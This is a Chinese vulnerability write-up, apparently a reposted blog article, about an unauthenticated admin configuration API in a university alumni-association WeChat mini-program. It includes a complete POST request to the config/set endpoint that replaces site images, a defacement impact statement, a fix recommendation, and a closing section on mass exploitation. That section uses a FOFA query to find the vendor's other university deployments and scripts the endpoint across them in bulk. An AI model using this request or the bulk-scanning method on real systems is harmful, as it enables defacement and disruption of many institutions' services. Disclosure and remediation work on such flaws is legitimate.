某次Edu校友会通用型漏洞

admin 2024年2月23日17:29:03评论14 views字数 1931阅读6分26秒阅读模式

0x00 漏洞介绍

漏洞名称:**某校友会小程序存在接口未鉴权问题

漏洞等级:中危

漏洞URL:

https://asd.***.edu.cn/api/admin/config/get

漏洞信息:某校友会小程序的修改配置信息相关接口存在未鉴权问题,攻击者可使用该接口修改大量网站配置项,可造成包括但不限于挂黑页等问题。

0x01 漏洞复现

首先访问https://asd.***.edu.cn/api/admin/config/get接口,可以看到小程序详细配置信息

某次Edu校友会通用型漏洞

到此处感觉并没有泄露出什么有用信息,都是图片,!也有厂商名字,我们回头看下该接口是 /api/admin/config/get,出现了get是获取接口中的配置信息,我们试想会不会出现set来配置信息呢?不知道,试下呗!

了解了具体配置信息的参数名后,使用:

https://asd.***.edu.cn/api/admin/config/set

记得改成POST传参,Content-Type也改为json格式

某次Edu校友会通用型漏洞

然后传参内容为data

某次Edu校友会通用型漏洞

尝试修改网站配置信息。这里我尝试修改register_background这一项

某次Edu校友会通用型漏洞

可以看到这个背景和小程序注册时的背景图是一致的

该图片特征过于明显,故裁去特征

某次Edu校友会通用型漏洞

那么尝试使用set接口修改这个登录的背景图,这里我尝试把它换成清华大学主页某图片

图片URL:

https://www.xxxxxxxx.edu.cn/__local/B/76/A6/07F5A1AB187C00083464BE040ED_E2C3F45F_1AD0F1.jpg

某次Edu校友会通用型漏洞

将上边构造好数据包中将原register_background改为上述清华大学的某图片

某次Edu校友会通用型漏洞

数据包如下:

POST /api/admin/config/set HTTP/1.1

Host: asd.***.edu.cn

Sec-Ch-Ua:
"Chromium";v="103",
".Not/A)Brand";v="99"

Sec-Ch-Ua-Mobile: ?0

Sec-Ch-Ua-Platform: "Windows"

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53
Safari/537.36

Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: none

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

Content-Type: application/json

Content-Length: 2829

{"id":1,"5dd1fc8e5403b.png",
中间数据省略。。。
"register_background":["https://www.tsinghua.edu.cn/__local/B/76/A6/07F5A1AB187C00083464BE040ED_E2C3F45F_1AD0F1.jpg"]

}

放包修改成功,这时候重新访问小程序,可以看到注册背景图成功替换:

某次Edu校友会通用型漏洞

(原图片已经改回去了,复现时使用上文的数据包即可)

0x02 漏洞危害

修改小程序上的文本、图片等配置信息,实现挂黑页的效果

恶意修改配置信息,可能导致小程序服务崩溃、宕机

0x03 修复建议:

对上述提到的接口,即

https://asd.***.edu.cn/api/admin/config/set做严格鉴权,不允许访客和普通用户使用该接口

如何进行通杀:

首先这是一款微信小程序,那么客户一般不会只有一个,前文泄露了厂商名字我们就去厂商官网找合作伙伴

某次Edu校友会通用型漏洞

接着针对他的子域名进行空间测绘收集,这里我使用的是FOFA

针对EDU某一子域名进行收集 语法:

org="China Education and Research Network Center" && host="某子域名"
一键导出之后就写脚本,拼接接口 /api/admin/config/get,这样批量跑很快就出货了。

原文始发于微信公众号(SecHub网络安全社区):某次Edu校友会通用型漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月23日17:29:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某次Edu校友会通用型漏洞https://cn-sec.com/archives/2518926.html

发表评论

匿名网友 填写信息